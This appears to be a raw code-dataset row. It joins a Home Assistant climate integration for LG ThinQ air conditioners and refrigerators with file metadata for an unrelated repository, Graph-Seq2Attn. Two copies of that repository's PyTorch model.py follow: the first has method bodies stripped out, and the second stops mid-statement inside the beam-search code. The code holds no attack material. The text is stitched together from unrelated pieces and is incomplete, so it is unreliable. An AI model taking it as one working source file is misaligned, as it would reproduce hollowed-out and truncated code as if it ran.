"""Platform for LGE climate integration.""" from __future__ import annotations from dataclasses import dataclass from datetime import timedelta import logging from typing import Any, Awaitable, Callable, List, Tuple from .wideq import ( FEAT_HUMIDITY, FEAT_OUT_WATER_TEMP, UNIT_TEMP_FAHRENHEIT, DeviceType, ) from .wideq.ac import AirConditionerDevice, ACMode from homeassistant.components.climate import ClimateEntity, ClimateEntityDescription from homeassistant.components.climate.const import ( ATTR_HVAC_MODE, DEFAULT_MAX_TEMP, DEFAULT_MIN_TEMP, ClimateEntityFeature, HVACMode, ) from homeassistant.config_entries import ConfigEntry from homeassistant.const import ATTR_TEMPERATURE, TEMP_CELSIUS, TEMP_FAHRENHEIT from homeassistant.core import HomeAssistant from homeassistant.helpers.entity_platform import AddEntitiesCallback from homeassistant.helpers.update_coordinator import CoordinatorEntity from . import LGEDevice from .const import DOMAIN, LGE_DEVICES from .device_helpers import ( TEMP_UNIT_LOOKUP, LGERefrigeratorDevice, get_entity_name, ) # general ac attributes ATTR_FRIDGE = "fridge" ATTR_FREEZER = "freezer" HVAC_MODE_LOOKUP: dict[str, HVACMode] = { ACMode.ENERGY_SAVER.name: HVACMode.AUTO, ACMode.AI.name: HVACMode.AUTO, ACMode.HEAT.name: HVACMode.HEAT, ACMode.DRY.name: HVACMode.DRY, ACMode.COOL.name: HVACMode.COOL, ACMode.FAN.name: HVACMode.FAN_ONLY, ACMode.ACO.name: HVACMode.HEAT_COOL, } ATTR_SWING_HORIZONTAL = "swing_mode_horizontal" ATTR_SWING_VERTICAL = "swing_mode_vertical" SWING_PREFIX = ["Vertical", "Horizontal"] SCAN_INTERVAL = timedelta(seconds=120) _LOGGER = logging.getLogger(__name__) @dataclass class ThinQRefClimateRequiredKeysMixin: """Mixin for required keys.""" range_temp_fn: Callable[[Any], List[float]] set_temp_fn: Callable[[Any, float], Awaitable[None]] temp_fn: Callable[[Any], float | str] @dataclass class ThinQRefClimateEntityDescription( ClimateEntityDescription, ThinQRefClimateRequiredKeysMixin ): """A class that describes ThinQ climate entities.""" REFRIGERATOR_CLIMATE: Tuple[ThinQRefClimateEntityDescription, ...] 
= ( ThinQRefClimateEntityDescription( key=ATTR_FRIDGE, name="Fridge", icon="mdi:fridge-top", range_temp_fn=lambda x: x.device.fridge_target_temp_range, set_temp_fn=lambda x, y: x.device.set_fridge_target_temp(y), temp_fn=lambda x: x.temp_fridge, ), ThinQRefClimateEntityDescription( key=ATTR_FREEZER, name="Freezer", icon="mdi:fridge-bottom", range_temp_fn=lambda x: x.device.freezer_target_temp_range, set_temp_fn=lambda x, y: x.device.set_freezer_target_temp(y), temp_fn=lambda x: x.temp_freezer, ), ) def remove_prefix(text: str, prefix: str) -> str: """Remove a prefix from a string.""" if text.startswith(prefix): return text[len(prefix):] return text async def async_setup_entry( hass: HomeAssistant, entry: ConfigEntry, async_add_entities: AddEntitiesCallback ) -> None: """Set up LGE device climate based on config_entry.""" entry_config = hass.data[DOMAIN] lge_devices = entry_config.get(LGE_DEVICES) if not lge_devices: return _LOGGER.debug("Starting LGE ThinQ climate setup...") lge_climates = [] # AC devices lge_climates.extend( [ LGEACClimate(lge_device) for lge_device in lge_devices.get(DeviceType.AC, []) ] ) # Refrigerator devices lge_climates.extend( [ LGERefrigeratorClimate(lge_device, refrigerator_desc) for refrigerator_desc in REFRIGERATOR_CLIMATE for lge_device in lge_devices.get(DeviceType.REFRIGERATOR, []) ] ) async_add_entities(lge_climates) class LGEClimate(CoordinatorEntity, ClimateEntity): """Base climate device.""" def __init__(self, api: LGEDevice): """Initialize the climate.""" super().__init__(api.coordinator) self._api = api self._attr_device_info = api.device_info @property def should_poll(self) -> bool: """Return True if entity has to be polled for state. We overwrite coordinator property default setting because we need to poll to avoid the effect that after changing a climate settings it is immediately set to prev state. The async_update method here do nothing because the real update is performed by coordinator. """ return True async def async_update(self) -> None: """Update the entity. This is a fake update, real update is done by coordinator. 
""" return @property def available(self) -> bool: """Return True if entity is available.""" return self._api.available class LGEACClimate(LGEClimate): """Air-to-Air climate device.""" def __init__(self, api: LGEDevice) -> None: """Initialize the climate.""" super().__init__(api) self._device: AirConditionerDevice = api.device self._attr_name = api.name self._attr_unique_id = f"{api.unique_id}-AC" self._attr_fan_modes = self._device.fan_speeds self._attr_swing_modes = [ f"{SWING_PREFIX[0]}{mode}" for mode in self._device.vertical_step_modes ] + [ f"{SWING_PREFIX[1]}{mode}" for mode in self._device.horizontal_step_modes ] self._hvac_mode_lookup: dict[str, HVACMode] | None = None self._support_ver_swing = len(self._device.vertical_step_modes) > 0 self._support_hor_swing = len(self._device.horizontal_step_modes) > 0 self._set_hor_swing = self._support_hor_swing and not self._support_ver_swing def _available_hvac_modes(self) -> dict[str, HVACMode]: """Return available hvac modes from lookup dict.""" if self._hvac_mode_lookup is None: modes = {} for key, mode in HVAC_MODE_LOOKUP.items(): if key in self._device.op_modes: # invert key and mode to avoid duplicated HVAC modes modes[mode] = key self._hvac_mode_lookup = {v: k for k, v in modes.items()} return self._hvac_mode_lookup def _get_swing_mode(self, hor_mode=False) -> str | None: """Return the current swing mode for vert of hor mode.""" if hor_mode: mode = self._api.state.horizontal_step_mode else: mode = self._api.state.vertical_step_mode if mode: return f"{SWING_PREFIX[1 if hor_mode else 0]}{mode}" return None @property def supported_features(self) -> int: """Return the list of supported features.""" features = ClimateEntityFeature.TARGET_TEMPERATURE if len(self.fan_modes) > 0: features |= ClimateEntityFeature.FAN_MODE if self._support_ver_swing or self._support_hor_swing: features |= ClimateEntityFeature.SWING_MODE return features @property def extra_state_attributes(self): """Return the optional state attributes with device specific additions.""" attr = {} if self._support_hor_swing: attr[ATTR_SWING_HORIZONTAL] = self._get_swing_mode(True) if self._support_ver_swing: attr[ATTR_SWING_VERTICAL] = self._get_swing_mode(False) return attr @property def target_temperature_step(self) -> float: """Return the supported step of target temperature.""" return self._device.target_temperature_step @property def temperature_unit(self) -> str: """Return the unit of measurement used by the platform.""" if self._device.temperature_unit == UNIT_TEMP_FAHRENHEIT: return TEMP_FAHRENHEIT return TEMP_CELSIUS @property def hvac_mode(self) -> HVACMode: """Return hvac operation ie. 
heat, cool mode.""" op_mode: str | None = self._api.state.operation_mode if not self._api.state.is_on or op_mode is None: return HVACMode.OFF modes = self._available_hvac_modes() return modes.get(op_mode, HVACMode.AUTO) async def async_set_hvac_mode(self, hvac_mode: HVACMode) -> None: """Set new target hvac mode.""" if hvac_mode == HVACMode.OFF: await self._device.power(False) return modes = self._available_hvac_modes() reverse_lookup = {v: k for k, v in modes.items()} operation_mode = reverse_lookup.get(hvac_mode) if operation_mode is None: raise ValueError(f"Invalid hvac_mode [{hvac_mode}]") if self.hvac_mode == HVACMode.OFF: await self._device.power(True) await self._device.set_op_mode(operation_mode) @property def hvac_modes(self) -> list[HVACMode]: """Return the list of available hvac operation modes.""" modes = self._available_hvac_modes() return [HVACMode.OFF] + list(modes.values()) @property def current_temperature(self) -> float: """Return the current temperature.""" curr_temp = None if self._device.is_air_to_water: curr_temp = self._api.state.device_features.get(FEAT_OUT_WATER_TEMP) if curr_temp is None: curr_temp = self._api.state.current_temp return curr_temp @property def current_humidity(self) -> int | None: return self._api.state.device_features.get(FEAT_HUMIDITY) @property def target_temperature(self) -> float: """Return the temperature we try to reach.""" return self._api.state.target_temp async def async_set_temperature(self, **kwargs) -> None: """Set new target temperature.""" if hvac_mode := kwargs.get(ATTR_HVAC_MODE): await self.async_set_hvac_mode(HVACMode(hvac_mode)) if new_temp := kwargs.get(ATTR_TEMPERATURE): await self._device.set_target_temp(new_temp) @property def fan_mode(self) -> str | None: """Return the fan setting.""" return self._api.state.fan_speed async def async_set_fan_mode(self, fan_mode: str) -> None: """Set new target fan mode.""" if fan_mode not in self.fan_modes: raise ValueError(f"Invalid fan mode [{fan_mode}]") await self._device.set_fan_speed(fan_mode) @property def swing_mode(self) -> str | None: """Return the swing mode setting.""" if self._set_hor_swing and self._support_hor_swing: return self._get_swing_mode(True) return self._get_swing_mode(False) async def async_set_swing_mode(self, swing_mode: str) -> None: """Set new target swing mode.""" avl_mode = False curr_mode = None set_hor_swing = swing_mode.startswith(SWING_PREFIX[1]) dev_mode = remove_prefix( swing_mode, SWING_PREFIX[1 if set_hor_swing else 0] ) if set_hor_swing: if dev_mode in self._device.horizontal_step_modes: avl_mode = True curr_mode = self._api.state.horizontal_step_mode elif swing_mode.startswith(SWING_PREFIX[0]): if dev_mode in self._device.vertical_step_modes: avl_mode = True curr_mode = self._api.state.vertical_step_mode if not avl_mode: raise ValueError(f"Invalid swing_mode [{swing_mode}].") if curr_mode != dev_mode: if set_hor_swing: await self._device.set_horizontal_step_mode(dev_mode) else: await self._device.set_vertical_step_mode(dev_mode) self._set_hor_swing = set_hor_swing async def async_turn_on(self) -> None: """Turn the entity on.""" await self._device.power(True) async def async_turn_off(self) -> None: """Turn the entity off.""" await self._device.power(False) @property def min_temp(self) -> float: """Return the minimum temperature.""" if (min_value := self._device.target_temperature_min) is not None: return min_value return self._device.conv_temp_unit(DEFAULT_MIN_TEMP) @property def max_temp(self) -> float: """Return the maximum temperature.""" if 
(max_value := self._device.target_temperature_max) is not None: return max_value return self._device.conv_temp_unit(DEFAULT_MAX_TEMP) class LGERefrigeratorClimate(LGEClimate): """Refrigerator climate device.""" entity_description = ThinQRefClimateEntityDescription def __init__( self, api: LGEDevice, description: ThinQRefClimateEntityDescription, ) -> None: """Initialize the climate.""" super().__init__(api) self._wrap_device = LGERefrigeratorDevice(api) self.entity_description = description self._attr_name = get_entity_name(api, description.key, description.name) self._attr_unique_id = f"{api.unique_id}-{description.key}-AC" self._attr_hvac_modes = [HVACMode.AUTO] self._attr_hvac_mode = HVACMode.AUTO @property def supported_features(self) -> int: """Return the list of supported features.""" if not self._wrap_device.device.set_values_allowed: return 0 return ClimateEntityFeature.TARGET_TEMPERATURE @property def target_temperature_step(self) -> float: """Return the supported step of target temperature.""" return self._wrap_device.device.target_temperature_step @property def temperature_unit(self) -> str: """Return the unit of measurement used by the platform.""" if self._api.state: unit = self._api.state.temp_unit return TEMP_UNIT_LOOKUP.get(unit, TEMP_CELSIUS) return TEMP_CELSIUS @property def current_temperature(self) -> float | None: """Return the current temperature.""" curr_temp = self.entity_description.temp_fn(self._wrap_device) if curr_temp is None: return None try: return int(curr_temp) except ValueError: return None @property def target_temperature(self) -> float | None: """Return the temperature we try to reach.""" return self.current_temperature async def async_set_temperature(self, **kwargs) -> None: """Set new target temperature.""" if new_temp := kwargs.get(ATTR_TEMPERATURE): await self.entity_description.set_temp_fn(self._wrap_device, new_temp) @property def min_temp(self) -> float: """Return the minimum temperature.""" return self.entity_description.range_temp_fn(self._wrap_device)[0] @property def max_temp(self) -> float: return self.entity_description.range_temp_fn(self._wrap_device)[1]
168
0
52
bc9f8efdc0e855ffa8421ab4eb5c22778be09608
34,764
py
Python
model.py
xuefei1/Graph-Seq2Attn
336c69877e483c95d9996ee205d2a005342f08af
[ "MIT" ]
1
2020-01-06T07:49:46.000Z
2020-01-06T07:49:46.000Z
model.py
xuefei1/Graph-Seq2Attn
336c69877e483c95d9996ee205d2a005342f08af
[ "MIT" ]
1
2020-04-16T10:15:27.000Z
2020-04-16T16:41:42.000Z
model.py
xuefei1/Graph-Seq2Attn
336c69877e483c95d9996ee205d2a005342f08af
[ "MIT" ]
null
null
null
import copy import math import time import torch import torch.nn as nn import numpy as np from constants import * from embeddings import * from tqdm import tqdm from utils.model_utils import device, model_checkpoint from utils.misc_utils import write_line_to_file from utils.lang_utils import make_std_mask from evaluate import corpus_eval def clones(module, n): "Produce n identical layers." return nn.ModuleList([copy.deepcopy(module) for _ in range(n)]) def attention(query, key, value, mask=None, dropout=None): "Compute 'Scaled Dot Product Attention'" d_k = query.size(-1) scores = torch.matmul(query, key.transpose(-2, -1)) / math.sqrt(d_k) # batch_size x n_heads x seq_len x seq_len, i.e. attn score on each word if mask is not None: scores = scores.masked_fill(mask == 0, -1e9) p_attn = torch.softmax(scores, dim=-1) # batch_size x n_heads x seq_len x seq_len, softmax on last dimension, i.e. 3rd dimension attend on 4th dimension if dropout is not None: p_attn = dropout(p_attn) return torch.matmul(p_attn, value), p_attn # attended output, attention vec class NoamOpt: "Optim wrapper that implements rate." def step(self): "Update parameters and rate" self._step += 1 rate = self.rate() for p in self.optimizer.param_groups: p['lr'] = rate self._rate = rate self.optimizer.step() def rate(self, step=None): "Implement `lrate` above" if step is None: step = self._step return self.factor * \ (self.model_size ** (-0.5) * min(step ** (-0.5), step * self.warmup ** (-1.5))) class LabelSmoothing(nn.Module): "Label smoothing actually starts to penalize the model if it gets very confident about a given choice" class LayerNorm(nn.Module): "Construct a layernorm module (See citation for details)." class PositionwiseFeedForward(nn.Module): "Implements FFN equation." class SublayerConnection(nn.Module): """ A residual connection followed by a layer norm. """ def forward(self, x, sublayer_func): "Apply residual connection to any sublayer with the same size." layer_output = sublayer_func(x) residual_rv = x + self.dropout(layer_output) return self.norm(residual_rv) class PositionalEncoding(nn.Module): "Implement the PE function." class GCN(nn.Module): """ A GCN/Contextualized GCN module operated on dependency graphs. """ def forward(self, gcn_inputs, adj): """ :param adj: batch_size * num_vertex * num_vertex :param gcn_inputs: batch_size * num_vertex * input_dim :return: gcn_outputs: list of batch_size * num_vertex * hidden_dim mask: batch_size * num_vertex * 1. In mask, 1 denotes this vertex is PAD vertex, 0 denotes true vertex. """ # use out degree, assume undirected graph denom = adj.sum(2).unsqueeze(2) + 1 adj_mask = (adj.sum(2) + adj.sum(1)).eq(0).unsqueeze(2) gcn_outputs = [] for l in range(self.num_layers): Ax = adj.bmm(gcn_inputs) AxW = self.W[l](Ax) AxW = AxW + self.W[l](gcn_inputs) # self loop AxW = AxW / denom gAxW = torch.relu(AxW) gcn_inputs = self.gcn_drop(gAxW) if l < self.num_layers - 1 else gAxW gcn_outputs.append(gcn_inputs) return gcn_outputs, adj_mask class Generator(nn.Module): "Define standard linear + softmax generation step."
45.984127
156
0.631544
import copy import math import time import torch import torch.nn as nn import numpy as np from constants import * from embeddings import * from tqdm import tqdm from utils.model_utils import device, model_checkpoint from utils.misc_utils import write_line_to_file from utils.lang_utils import make_std_mask from evaluate import corpus_eval def clones(module, n): "Produce n identical layers." return nn.ModuleList([copy.deepcopy(module) for _ in range(n)]) def build_sents_mask(data_dict, pad_idx=0, eos_idx=3): batch_sents_list = data_dict[DK_DOC_SENTS_WID] batch_size = data_dict[DK_BATCH_SIZE] batch_sents_mask = torch.ones(batch_size, 1, len(batch_sents_list)).type(torch.ByteTensor).to(device()) for si, src in enumerate(batch_sents_list): assert src.shape[0] == batch_size src = src.to(device()) if pad_idx is not None: b_exc_pad = (src != pad_idx) else: b_exc_pad = torch.ones(src.size()).type(torch.BoolTensor).to(device()) if eos_idx is not None: b_exc_eos = (src != eos_idx) else: b_exc_eos = torch.ones(src.size()).type(torch.BoolTensor).to(device()) b_exc_both = b_exc_pad & b_exc_eos b_exc_aggr = b_exc_both.sum(1) mask_vals = (b_exc_aggr != 0) batch_sents_mask[:, 0, si] = mask_vals return batch_sents_mask.to(device()) def attention(query, key, value, mask=None, dropout=None): "Compute 'Scaled Dot Product Attention'" d_k = query.size(-1) scores = torch.matmul(query, key.transpose(-2, -1)) / math.sqrt(d_k) # batch_size x n_heads x seq_len x seq_len, i.e. attn score on each word if mask is not None: scores = scores.masked_fill(mask == 0, -1e9) p_attn = torch.softmax(scores, dim=-1) # batch_size x n_heads x seq_len x seq_len, softmax on last dimension, i.e. 3rd dimension attend on 4th dimension if dropout is not None: p_attn = dropout(p_attn) return torch.matmul(p_attn, value), p_attn # attended output, attention vec class NoamOpt: "Optim wrapper that implements rate." 
def __init__(self, model_size, factor, warmup, optimizer): self.optimizer = optimizer self._step = 0 self.warmup = warmup self.factor = factor self.model_size = model_size self._rate = 0 def step(self): "Update parameters and rate" self._step += 1 rate = self.rate() for p in self.optimizer.param_groups: p['lr'] = rate self._rate = rate self.optimizer.step() def rate(self, step=None): "Implement `lrate` above" if step is None: step = self._step return self.factor * \ (self.model_size ** (-0.5) * min(step ** (-0.5), step * self.warmup ** (-1.5))) def zero_grad(self): self.optimizer.zero_grad() def state_dict(self): rv = {} rv["_step"] = self._step rv["warmup"] = self.warmup rv["factor"] = self.factor rv["model_size"] = self.model_size rv["_rate"] = self._rate rv["opt_state_dict"] = self.optimizer.state_dict() return rv def load_state_dict(self, state_dict): self._step = state_dict["_step"] self.warmup = state_dict["warmup"] self.factor = state_dict["factor"] self.model_size = state_dict["model_size"] self._rate = state_dict["_rate"] self.optimizer.load_state_dict(state_dict["opt_state_dict"]) for state in self.optimizer.state.values(): for k, v in state.items(): if isinstance(v, torch.Tensor): state[k] = v.to(device()) class LabelSmoothing(nn.Module): "Label smoothing actually starts to penalize the model if it gets very confident about a given choice" def __init__(self, size, padding_idx, smoothing=0.0): super(LabelSmoothing, self).__init__() self.criterion = nn.KLDivLoss(reduction="sum") self.padding_idx = padding_idx self.confidence = 1.0 - smoothing self.smoothing = smoothing self.size = size def forward(self, x, target): assert x.size(1) == self.size x = x.to(device()) target = target.to(device()) true_dist = x.data.clone() true_dist.fill_(self.smoothing / (self.size - 2)) indices = target.data.unsqueeze(1) true_dist.scatter_(1, indices, self.confidence) true_dist[:, self.padding_idx] = 0 mask = torch.nonzero(target.data == self.padding_idx) if mask.shape[0] > 0: true_dist.index_fill_(0, mask.squeeze(), 0.0) return self.criterion(x, true_dist) class GraphSeq2Attn(nn.Module): def __init__(self, doc_gcn_kw_embed, doc_gcn_merge_embed, doc_sents_wid_embed, tgt_wid_embed, doc_merge_gcn, doc_kw_dist_gcn, sents_encoder, ctx_encoder, pool, decoder, generator, pad_idx=0, sos_idx=2, eos_idx=3): super(GraphSeq2Attn, self).__init__() self.doc_gcn_kw_embed = doc_gcn_kw_embed self.doc_gcn_merge_embed = doc_gcn_merge_embed self.doc_sents_wid_embed = doc_sents_wid_embed self.tgt_wid_embed = tgt_wid_embed self.doc_merge_gcn = doc_merge_gcn self.doc_kw_dist_gcn = doc_kw_dist_gcn self.sents_encoder = sents_encoder self.ctx_encoder = ctx_encoder self.pool = pool self.decoder = decoder self.generator = generator self.pad_idx = pad_idx self.sos_idx = sos_idx self.eos_idx = eos_idx def forward(self, data_dict): sos = torch.ones(1, 1).type(torch.LongTensor).fill_(self.sos_idx).repeat(data_dict[DK_BATCH_SIZE], 1).to(device()) tgt = data_dict[DK_TGT_GEN_WID].to(device()) tgt = torch.cat([sos, tgt], dim=1) tgt = tgt[:, :-1] tgt_mask = make_std_mask(tgt, self.pad_idx) enc_list = self.encode(data_dict) decoder_out = self.decode(tgt, tgt_mask, enc_list) g_probs = self.generator(decoder_out) return g_probs def encode(self, data_dict): sents_encoded = [] batch_sents_list = data_dict[DK_DOC_SENTS_WID] enc_hidden = None for src in batch_sents_list: src = src.to(device()) enc_op, enc_hidden = self.encode_seq(src, enc_hidden) sents_encoded.append(enc_op) sents_encoded = torch.cat(sents_encoded, dim=1) 
batch_sents_attn_mask = build_sents_mask(data_dict, pad_idx=self.pad_idx, eos_idx=self.eos_idx) doc_merge_embedded, doc_merge_adj, _ = self.doc_gcn_merge_embed(data_dict, sents_encoded) doc_merge_layer_outputs, _ = self.doc_merge_gcn(doc_merge_embedded, doc_merge_adj) doc_graph_out = doc_merge_layer_outputs[-1] kw_dist_embedded, kw_dist_adj, kw_dist_mask = self.doc_gcn_kw_embed(data_dict) kw_dist_layer_outputs, _ = self.doc_kw_dist_gcn(kw_dist_embedded, kw_dist_adj) kw_dist_out = kw_dist_layer_outputs[-1] sent_lens_mask = build_sents_mask(data_dict, pad_idx=self.pad_idx, eos_idx=None) sent_lens = sent_lens_mask.squeeze(1).sum(1) doc_encoded, _ = self.ctx_encoder(sents_encoded, sent_lens) rv = [(doc_encoded, batch_sents_attn_mask), (doc_graph_out, batch_sents_attn_mask), (kw_dist_out, kw_dist_mask)] return rv def encode_seq(self, src, encoder_hidden=None, encoder_cell=None): if self.sents_encoder.rnn_type.lower() == "lstm": encoder_hidden = (encoder_hidden, encoder_cell) src_lens = (src != self.pad_idx).sum(1).to(device()) src = self.doc_sents_wid_embed(src) encoder_op, encoder_hidden = self.sents_encoder(src, src_lens, encoder_hidden) return encoder_op[:,-1,:].unsqueeze(1), encoder_hidden def decode(self, tgt, tgt_mask, src_tup_list): tgt_embedded = self.tgt_wid_embed(tgt) mem_tup_list = [] for t in src_tup_list: mem = self.pool(t[0]) mem_mask = t[1] if mem_mask is not None and mem.shape[1] != mem_mask.shape[2]: mem_mask = None mem_tup_list.append((mem, mem_mask)) decoder_out = self.decoder(tgt_embedded, tgt_mask, mem_tup_list) # decoder_out = self.decoder(tgt_embedded, tgt_mask, src_tup_list) return decoder_out def predict(self, decoder_out, topk=1, topk_dim=2): decoder_out = decoder_out[:, -1, :].unsqueeze(1) prob = self.generator(decoder_out) val, indices = prob.topk(topk, dim=topk_dim) return prob, val, indices class MultiHeadedAttention(nn.Module): def __init__(self, h, d_model, dropout=0.0): "Take in model size and number of heads." super(MultiHeadedAttention, self).__init__() assert d_model % h == 0 # We assume d_v always equals d_k self.d_k = d_model // h # dimesion of keys should be constrained by model hidden size? self.h = h self.linears = clones(nn.Linear(d_model, d_model), 3) # d_model to d_model, attn key dimension downsize is achieved through reshaping self.attn = None self.dropout = nn.Dropout(p=dropout) self.last_ff = nn.Linear(d_model, d_model) def forward(self, query, key, value, mask=None): "Implements Figure 2" if mask is not None: # Same mask applied to all h heads. mask = mask.unsqueeze(1) nbatches = query.size(0) # 1) Do all the linear projections in batch from d_model => h x d_k # batch_size x seq_len x d_model => batch_size x n_heads x seq_len x d_k query, key, value = [l(x).view(nbatches, -1, self.h, self.d_k).transpose(1, 2) # batch_size x n_heads x seq_len x d_k for l, x in zip(self.linears, (query, key, value))] # 2) Apply attention on all the projected vectors in batch. # batch_size x n_heads x seq_len x d_k => batch_size x n_heads x seq_len x d_k x, self.attn = attention(query, key, value, mask=mask, dropout=self.dropout) # 3) "Concat" using a view and apply a final linear. # batch_size x n_heads x seq_len x d_k => batch_size x seq_len x d_model x = x.transpose(1, 2).contiguous().view(nbatches, -1, self.h * self.d_k) x = self.last_ff(x) return x class LayerNorm(nn.Module): "Construct a layernorm module (See citation for details)." 
def __init__(self, features, eps=1e-6): super(LayerNorm, self).__init__() self.a_2 = nn.Parameter(torch.ones(features)) self.b_2 = nn.Parameter(torch.zeros(features)) self.eps = eps def forward(self, x): mean = x.mean(-1, keepdim=True) std = x.std(-1, keepdim=True) return self.a_2 * (x - mean) / (std + self.eps) + self.b_2 class PositionwiseFeedForward(nn.Module): "Implements FFN equation." def __init__(self, d_model, d_ff, dropout=0.0): super(PositionwiseFeedForward, self).__init__() self.layer_1 = nn.Linear(d_model, d_ff) self.layer_2 = nn.Linear(d_ff, d_model) self.dropout = nn.Dropout(dropout) def forward(self, x): l1_output = torch.relu(self.layer_1(x)) l1_output = self.dropout(l1_output) l2_output = self.layer_2(l1_output) return l2_output class SublayerConnection(nn.Module): """ A residual connection followed by a layer norm. """ def __init__(self, size, dropout): super(SublayerConnection, self).__init__() self.norm = LayerNorm(size) self.dropout = nn.Dropout(dropout) def forward(self, x, sublayer_func): "Apply residual connection to any sublayer with the same size." layer_output = sublayer_func(x) residual_rv = x + self.dropout(layer_output) return self.norm(residual_rv) class SequentialDecoderLayer(nn.Module): def __init__(self, size, attn, pos_ff, dropout, n_parallel_units=1): super(SequentialDecoderLayer, self).__init__() c = copy.deepcopy self.size = size self.pos_ff = c(pos_ff) self.self_attn = c(attn) self.p_attns = clones(attn, n_parallel_units) self.n_parallel_units = n_parallel_units self.sublayer = SublayerConnection(size, dropout) def forward(self, tgt, tgt_mask, attn_in_tup_list): rv = self.sublayer(tgt, lambda q: self.self_attn(q, q, q, tgt_mask)) for i, t in enumerate(attn_in_tup_list): rv = self.sublayer(rv, lambda q: self.p_attns[i](q, t[0], t[0], t[1])) rv = self.sublayer(rv, self.pos_ff) return rv class SequentialDecoder(nn.Module): def __init__(self, d_model, layer, n, pos_embed=None): super(SequentialDecoder, self).__init__() self.d_model = d_model self.layers = clones(layer, n) self.pos_embed = copy.deepcopy(pos_embed) if pos_embed is not None else None def forward(self, tgt, tgt_mask, attn_in_tup_list): rv = tgt if self.pos_embed is not None: rv = self.pos_embed(rv) for layer in self.layers: rv = layer(rv, tgt_mask, attn_in_tup_list) return rv class PositionalEncoding(nn.Module): "Implement the PE function." def __init__(self, d_model, dropout=0.0, max_len=5000): super(PositionalEncoding, self).__init__() # Compute the positional encodings once in log space. pe = torch.zeros(max_len, d_model) position = torch.arange(0, max_len).type(torch.FloatTensor).unsqueeze(1) div_term = torch.exp(torch.arange(0, d_model, 2).type(torch.FloatTensor) * -(math.log(10000.0) / d_model)) pe[:, 0::2] = torch.sin(position * div_term) pe[:, 1::2] = torch.cos(position * div_term) pe = pe.unsqueeze(0) self.register_buffer('pe', pe) # mark as not learnable parameters, but still part of the state def forward(self, x, pe_expand_dim=None): encoding_vals = self.pe if pe_expand_dim is not None: encoding_vals = self.pe.unsqueeze(pe_expand_dim) x = x + encoding_vals[:, :x.size(1), :] # just reads the first seq_len positional embedding values return x class GCN(nn.Module): """ A GCN/Contextualized GCN module operated on dependency graphs. 
""" def __init__(self, input_dim, hidden_dim, output_dim, dropout=0.0, num_layers=2): super(GCN, self).__init__() self.num_layers = num_layers self.input_dim = input_dim self.hidden_dim = hidden_dim self.output_dim = output_dim self.gcn_drop = nn.Dropout(dropout) # gcn layer self.W = nn.ModuleList() for layer_idx in range(self.num_layers): input_dim = self.input_dim if layer_idx == 0 else self.hidden_dim output_dim = self.output_dim if layer_idx == self.num_layers-1 else self.hidden_dim self.W.append(nn.Linear(input_dim, output_dim)) def forward(self, gcn_inputs, adj): """ :param adj: batch_size * num_vertex * num_vertex :param gcn_inputs: batch_size * num_vertex * input_dim :return: gcn_outputs: list of batch_size * num_vertex * hidden_dim mask: batch_size * num_vertex * 1. In mask, 1 denotes this vertex is PAD vertex, 0 denotes true vertex. """ # use out degree, assume undirected graph denom = adj.sum(2).unsqueeze(2) + 1 adj_mask = (adj.sum(2) + adj.sum(1)).eq(0).unsqueeze(2) gcn_outputs = [] for l in range(self.num_layers): Ax = adj.bmm(gcn_inputs) AxW = self.W[l](Ax) AxW = AxW + self.W[l](gcn_inputs) # self loop AxW = AxW / denom gAxW = torch.relu(AxW) gcn_inputs = self.gcn_drop(gAxW) if l < self.num_layers - 1 else gAxW gcn_outputs.append(gcn_inputs) return gcn_outputs, adj_mask class EncoderRNN(nn.Module): def __init__(self, input_size, hidden_size, n_layers=1, rnn_dir=2, dropout_prob=0.0, rnn_type="gru"): super(EncoderRNN, self).__init__() self.input_size = input_size self.hidden_size = hidden_size self.n_layers = n_layers self.rnn_dir = rnn_dir self.rnn_type = rnn_type self.dropout_prob = dropout_prob if self.rnn_type == "lstm": self.rnn = nn.LSTM(input_size=self.input_size, hidden_size=self.hidden_size, num_layers=self.n_layers, dropout=self.dropout_prob if self.n_layers>1 else 0, batch_first=True, bidirectional=self.rnn_dir==2) else: self.rnn = nn.GRU(input_size=self.input_size, hidden_size=self.hidden_size, num_layers=self.n_layers, dropout=self.dropout_prob if self.n_layers>1 else 0, batch_first=True, bidirectional=self.rnn_dir==2) def forward(self, embedded, input_lengths, hidden=None): outputs, hidden = self.rnn(embedded, hidden) return outputs, hidden class SeqMaxPoolLayer(nn.Module): def __init__(self, d_model, max_pool_factor=2, min_seq_len=4, fill_val=-1e9): super(SeqMaxPoolLayer, self).__init__() self.min_seq_len = min_seq_len self.max_pool_factor = max_pool_factor self.d_model = d_model self.max_pool = nn.MaxPool1d(self.max_pool_factor, stride=self.max_pool_factor) self.fill_val = fill_val def pad_to_max_pool_size(self, x, fill_val=None): fill_val = self.fill_val if fill_val is None else fill_val if x.shape[1] <= self.min_seq_len or self.max_pool_factor <= 1: return x if x.shape[1] % self.max_pool_factor != 0: new_size = x.shape[1] + (self.max_pool_factor - x.shape[1] % self.max_pool_factor) padded = torch.zeros(x.shape[0], new_size, x.shape[2]).type(torch.FloatTensor).to(device()) padded.fill_(fill_val) padded[:, :x.shape[1], :] = x else: padded = x return padded def forward(self, x): padded_x = self.pad_to_max_pool_size(x) if x.shape[1] > self.min_seq_len: padded_x = padded_x.transpose(1, 2) padded_x = self.max_pool(padded_x) padded_x = padded_x.transpose(1, 2) return padded_x class Generator(nn.Module): "Define standard linear + softmax generation step." 
def __init__(self, d_model, vocab): super(Generator, self).__init__() self.proj = nn.Linear(d_model, vocab) def forward(self, x): logits = self.proj(x) probs = torch.log_softmax(logits, dim=-1) return probs class BeamSearchResult: def __init__(self, i2w, idx_in_batch, beam_width=4, sos_idx=2, eos_idx=3, gamma=0.0, len_norm=0.0): self.idx_in_batch = idx_in_batch self.beam_width = beam_width self.gamma = gamma self.len_norm = len_norm self.eos_idx = eos_idx sos = torch.ones(1,1).fill_(sos_idx).type(torch.LongTensor).to(device()) self.curr_candidates = [ (sos, 1.0, [], [i2w[sos_idx]]) ] self.completed_insts = [] self.done = False def update(self, probs, next_vals, next_wids, next_words): assert len(next_wids) == len(self.curr_candidates) next_candidates = [] for i, tup in enumerate(self.curr_candidates): prev_tgt = tup[0] score = tup[1] prev_prob_list = [t for t in tup[2]] prev_words = [t for t in tup[3]] preds = next_wids[i] vals = next_vals[i] pred_words = next_words[i] prev_prob_list.append(probs) for bi in range(len(preds)): wi = preds[bi] val = vals[bi] word = pred_words[bi] div_penalty = 0.0 if bi > 0: div_penalty = self.gamma * (bi+1) new_score = score + val - div_penalty new_tgt = torch.cat([prev_tgt, torch.ones(1,1).type(torch.LongTensor).fill_(wi).to(device())], dim=1) new_words = [w for w in prev_words] new_words.append(word) if wi == self.eos_idx: if 